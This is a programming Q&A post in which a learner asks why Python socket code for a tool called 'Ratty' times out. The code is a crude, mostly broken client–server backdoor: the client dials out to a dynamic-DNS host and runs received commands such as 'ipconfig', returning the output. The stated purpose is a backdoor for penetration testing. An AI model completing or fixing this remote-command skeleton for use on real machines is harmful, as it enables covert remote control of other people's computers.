# Python Socket - A connection attempt failed

Tags: python, sockets

I have an issue with socket, i just learned it, and trying to connect to device outside my network.
this is the error message:

```
TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond
PS C:\Users\buf\Desktop\ratty>
```

server code:

```
import socket, threading
def start():
    server.listen()
    while True:
        conn, addr = server.accept()
        while True:
            command = input(">> ")
            if command == "ipconfig":
                server.send("ipconfig")
        thread = threading.Thread(target=handle,args=(conn,addr))
        thread.start()
def send(msg):
    message = msg.encode("utf-8")
    msg_length = len(msg)
    send_length = str(msg_length).encode("utf-8")
    send_length += b' ' * (header - len(send_length))
    clinet.send(send_length)
    clinet.send(message)
def handle(conn,addr):
    connected = True
    print(f"IP: {addr[0]} Connected")
    while connected:
        msg = conn.recv(header).decode("utf-8")
        command = input(">> ")
        if command == "ipconfig":
            send("ipconfig")
        if msg:
            msg = int(msg)
            msg_ = conn.recv(msg).decode("utf-8")
            if (msg == DISCONNECT_MESSAGE):
                print(f"IP: {addr[0]} Diconnected")
                connected = False
    conn.close()
header,host,port = 64,"",5050
address = (host,port)

server = socket.socket(socket.AF_INET,socket.INADDR_ANY)
server.bind(address)
DISCONNECT_MESSAGE = "disconnected"
print("Ratty - Host:\n\n")
start()
```

here the host was: example: hudwiqiuwdwqiu.ddns.net (NO-IP)
i changed to "" as i read in internet it does work.

the client code:

```
import socket, threading, os
header,host,port = 64,"hudwiqiuwdwqiu.ddns.net",5050
clinet = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
clinet.connect((host,port))

def send(msg):
    message = msg.encode("utf-8")
    msg_length = len(msg)
    send_length = str(msg_length).encode("utf-8")
    send_length += b' ' * (header - len(send_length))
    clinet.send(send_length)
    clinet.send(message)
import socket, threading
def start():
    server.listen()
    while True:
        conn, addr = server.accept()
        thread = threading.Thread(target=handle,args=(conn,addr))
        thread.start()

def handle(conn,addr):
    connected = True
    print(f"IP: {addr[0]} Connected")
    while connected:
        msg = conn.recv(header).decode("utf-8")
        if msg == "ipconfig":
            send(os.popen("ipconfig").read())
        if msg:
            msg = int(msg)
            msg_ = conn.recv(msg).decode("utf-8")
            if (msg == DISCONNECT_MESSAGE):
                print(f"IP: {addr[0]} Diconnected")
                connected = False
    conn.close()

address = (host,port)

server = socket.socket(socket.AF_INET,socket.INADDR_ANY)
server.connect(address)
DISCONNECT_MESSAGE = "disconnected"
print("Ratty - Clinet:\n\n")
send("test")
start()
```

what i'm trying to do is, connect two devices together outside the local network as backdoor, for penetration testing.
i tried several codes in web, none of them worked with me, also i opened the ports on my PC and Router, so i hope you help me out with this.

**OS**: windows 10

**Python Version** : 3.8^